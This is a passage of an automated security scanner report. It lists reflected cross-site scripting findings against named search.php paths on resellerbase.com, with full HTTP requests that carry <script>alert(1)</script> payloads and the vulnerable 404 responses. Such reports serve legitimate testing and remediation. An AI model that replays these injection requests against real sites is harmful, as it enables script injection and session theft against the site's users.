The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8b9e6<script>alert(1)</script>2df774cfc94 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication8b9e6<script>alert(1)</script>2df774cfc94/mobile-content/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication8b9e6<script>alert(1)</script>2df774cfc94/mobile-content/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.657. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 51093<script>alert(1)</script>994575759a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content51093<script>alert(1)</script>994575759a/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content51093<script>alert(1)</script>994575759a/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.658. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1ead2<script>alert(1)</script>76ba99984bc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes1ead2<script>alert(1)</script>76ba99984bc/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes1ead2<script>alert(1)</script>76ba99984bc/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.659. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3ec26<script>alert(1)</script>195001ed063 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos3ec26<script>alert(1)</script>195001ed063/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos3ec26<script>alert(1)</script>195001ed063/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.660. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8d8ca<script>alert(1)</script>b2f0fbf0c95 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images8d8ca<script>alert(1)</script>b2f0fbf0c95/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images8d8ca<script>alert(1)</script>b2f0fbf0c95/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.661. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 62e94<script>alert(1)</script>c22470ce835 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/review62e94<script>alert(1)</script>c22470ce835/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/review62e94<script>alert(1)</script>c22470ce835/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.662. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 8e92b<script>alert(1)</script>6167dfdf784 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/review/search.php8e92b<script>alert(1)</script>6167dfdf784?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/review/search.php8e92b<script>alert(1)</script>6167dfdf784?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.663. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/review/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 4e4a4<a>b3f89c90ab9 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search4e4a4<a>b3f89c90ab9&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search4e4a4<a>b3f89c90ab9&opt=2 was not found on this server.</p>
...[SNIP]...

2.664. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/review/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload da863<a>75c1d81939f was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/themes/kosmos/images/review/search.php?keyword=search...da863<a>75c1d81939f&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/review/search.php?keyword=search...da863<a>75c1d81939f&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.665. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 60882<script>alert(1)</script>d000d7b2976 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&60882<script>alert(1)</script>d000d7b2976=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&60882<script>alert(1)</script>d000d7b2976=1 was not found on this server.</p>
...[SNIP]...

2.666. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/review/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload cd67e<a>fd002dcdec5 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2cd67e<a>fd002dcdec5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2cd67e<a>fd002dcdec5 was not found on this server.</p>
...[SNIP]...

2.667. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 55089<script>alert(1)</script>de844a9047d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication55089<script>alert(1)</script>de844a9047d/mobile-content/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication55089<script>alert(1)</script>de844a9047d/mobile-content/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.668. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4b8bf<script>alert(1)</script>c81f90705dd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content4b8bf<script>alert(1)</script>c81f90705dd/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content4b8bf<script>alert(1)</script>c81f90705dd/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.669. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a92e0<script>alert(1)</script>ce60052ca89 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themesa92e0<script>alert(1)</script>ce60052ca89/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themesa92e0<script>alert(1)</script>ce60052ca89/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.670. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 65662<script>alert(1)</script>13de1f2b8af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos65662<script>alert(1)</script>13de1f2b8af/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos65662<script>alert(1)</script>13de1f2b8af/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.671. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e3b00<script>alert(1)</script>7a45073954 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/imagese3b00<script>alert(1)</script>7a45073954/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/imagese3b00<script>alert(1)</script>7a45073954/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.672. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload c3020<script>alert(1)</script>2a6bd098072 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/search.phpc3020<script>alert(1)</script>2a6bd098072?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/search.phpc3020<script>alert(1)</script>2a6bd098072?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.673. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 3f5f0<a>370a8541ac1 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/themes/kosmos/images/search.php?keyword=search...&Submit3=Search3f5f0<a>370a8541ac1&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
